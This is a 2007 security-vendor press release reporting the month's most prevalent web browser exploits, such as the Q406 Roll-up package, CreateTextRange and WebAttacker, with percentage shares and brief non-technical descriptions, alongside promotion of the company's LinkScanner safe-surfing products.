Exploit Prevention Labs
Home
  Products
  Threat Center
  Support
  About Us
  Media Center
  Contact Us
 
Quick Links
In the News
Press Releases

 

 
Media Center

Press Releases

EXPLOIT PREVENTION LABS RELEASES JANUARY EXPLOIT PREVALENCE SURVEY

“Q406 Roll-up” Exploit Package Continues to Dominate with 61.23 Percent of all Encounters

February 5, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), a leading developer of safe surfing software that protects against phishing, social engineering and other web-based exploits, today released the results of its January 2007 Exploit Prevalence Survey™. Now in its ninth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ LinkScanner family of safe surfing applications, combined with data collected from all levels of the company’s multi-faceted research network.

Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted steady activity among cybercriminals in January. For the second consecutive month, January’s number one exploit was an exploit package dubbed the “Q406 Roll-up” by Thompson. The package accounted for over 61 per cent of all exploit encounters, slightly down from December’s 70.9 per cent. The package consists of updated versions of exploits issued during the fourth quarter of 2006.

According to Thompson, the most common exploits in the package are Setslice, VML and XML, all of which were derived from proof-of-concepts released by HD Moore during his Month of Browser Bugs in September 2006. Also included in the package is the IE Com CreateObject exploit, originally released as a proof of concept in August, and which occupied November’s number one ranking with 30.45 per cent of all occurrences.

“The entire package is heavily encrypted, but it appears there are around a dozen individual exploits included,” said Thompson. “The continued dominance of the Q406 Roll-up shows that the bad guys are able to tweak their existing exploits and maintain relevancy in the market while they continue to develop new exploits, which can take months to design.”

The second most common exploit in January was CreateTextRange (cve-2006-1359), which came in with 8.45 per cent of all occurrences. CreateTextRange, a buffer overflow attack affecting Internet Explorer, has made several appearances in the Exploit Prevalence Survey since the survey began nine months ago.

“CreateTextRange has been a very stable exploit for the bad guys over the past few months,” Thompson noted. “It still has the ability to infect computers even though it was released back in March 2006 and a patch was issued quickly the following month.”

January’s big news was the long awaited release of Microsoft’s new operating system, Vista, which cyber criminals have already started targeting. One zero-day exploit has reportedly already been auctioned off for $50,000. “The next few weeks will be interesting,” Thompson said. “We will be watching very closely to see if the bad guys have anything up their sleeves. Although Vista doesn’t yet have many users, I think cyber criminals will still be motivated to develop exploits for it quickly, kind of like a virtual poke in the eye. Vista users should continue to take normal precautions, such as patching regularly and using exploit-specific protection like LinkScanner.”

Exploit Prevalence Results for the Month of January 2007

The following is a summary of the top five most-reported web exploits for January 2007:

Exploit

Rank last month

Percent of Overall Occurrences

Description

Q406 Roll-up package

New

61.23 percent (70.9 previous)

Comprised of up to a dozen exploits, the most common are setSlice, VML, XML, and (IE COM) Createcomobject Code. The package is usually heavily encrypted making it difficult to single out individual exploits.
CreateTextRange (CVE-2006-1359) 3 8.45 percent (4.5 previous) Released March 2006. This is a buffer overflow attack affecting Internet Explorer that enables the execution of arbitrary code, usually a downloader - a program whose job is to download and install another program such as a rootkit or a keylogger. Patched in April by Microsoft, this exploit remains a credible threat.

MDAC

2

7.10 percent (5.70 previous)

Although technically not an exploit, MDAC refers to a creative method of using certain ActiveX controls in a context for which Microsoft did not originally intend them to be used. They instantiate an ActiveX control inside a web script that allows files to be written to the disk and executed.

IE VML Overflow

9

5.37 percent (1.20 previous)

A buffer overflow exploit targets the Vector Markup Language feature of the Internet Explorer browser that allows execution of arbitrary code. Security researchers believe it was released on the 13th or 14th of September, right after Patch Tuesday on the 12th. The exploit affects most versions of IE. Microsoft issued an out-of-cycle patch September 27.

WebAttacker

6

5.18 percent (2.30 previous)

WebAttacker is a Russian-built software application, first introduced about two years ago. The exploit currently launches five different exploits, including the new IE VML Overflow, the new MDAC, a Firefox exploit, CreateTextRange, and an exploit for the Java Virtual Machine. Like a commercial software application, WebAttacker can be purchased online at underground hacker web sites for between $20 and $300, and requires minimal technical sophistication to use. The application is updated every few months, just like legitimate commercial software, only it is crimeware. A new update of WebAttacker, incorporating the IE VML exploit, was released on Exploit Wednesday (the day after Patch Tuesday) in September.

Note: Numbers above do not add up to 100 percent, due to the following lesser reported exploits: Iframers launcher script (2.88% vs. 3.6%)IE Com CreateObject code (ms06-042) (2.05% vs. .5%), WMF (cve-2005-2124) with known payload (2.50% vs. 2.70%), others (4.80 %)

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Resource Center at http://www.explabs.com/about/resCenter/.

About the LinkScanner Family of Safe Surfing Software

Exploit Prevention Labs provides a complete family of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.

The LinkScanner family of safe surfing products include LinkScanner Pro™, LinkScanner Lite™, and LinkScanner Online. LinkScanner Pro™ (free 15-day evaluation: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing Windows application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits.

LinkScanner Lite (http://www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links.

Both products run under Windows 2000, Windows XP, and Windows Vista.

LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned by an exploit distribution network. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.

About Exploit Prevention Labs

Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com

 
Home  |  Products  |  Support  |  About Us  |  Privacy Policy  |  Affiliate Program
Copyright © 2008 Exploit Prevention Labs. All rights reserved.